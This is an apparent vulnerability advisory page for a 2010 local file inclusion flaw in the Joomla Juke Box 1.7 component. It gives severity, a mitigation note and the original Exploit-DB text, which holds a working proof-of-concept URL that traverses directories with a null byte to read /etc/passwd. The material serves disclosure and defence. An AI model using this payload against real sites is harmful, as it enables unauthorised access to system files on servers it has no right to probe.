Joomla Component Juke Box Local File Inclusion Vulnerability

vendor:

Juke Box

by:

AntiSecurity

7,5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: Juke Box

Affected Version From: 1.7

Affected Version To: 1.7

Patch Exists: NO

Related CWE: N/A

CPE: a:jooforge:com_jukebox

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Joomla Component Juke Box Local File Inclusion Vulnerability

A Local File Inclusion (LFI) vulnerability exists in the Joomla Component Juke Box version 1.7. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This request contains a maliciously crafted parameter value which is then used to include a file from the local file system. This can be used to gain access to sensitive information or execute malicious code on the vulnerable server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated. This will ensure that maliciously crafted parameters are not used to include files from the local file system.

Source

Exploit-DB raw data:

=============================================================================================================


  [o] Joomla Component Juke Box Local File Inclusion Vulnerability
 
       Software : com_jukebox version 1.7
       Vendor   : http://www.jooforge.com/
       Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
       Contact  : public[dot]antisecurity[dot]org
       Home     : http://antisecurity.org/


=============================================================================================================


  [o] Exploit

       http://localhost/[path]/index.php?option=com_jukebox&controller=[LFI]


  [o] PoC

       http://localhost/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00


=============================================================================================================


  [o] Greetz

       Angela Zhang stardustmemory aJe martfella pizzyroot Genex
       H312Y yooogy mousekill }^-^{ noname matthews s4va wishnusakti
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


=============================================================================================================


  [o] April 06 2010 - GMT +07:00 Jakarta, Indonesia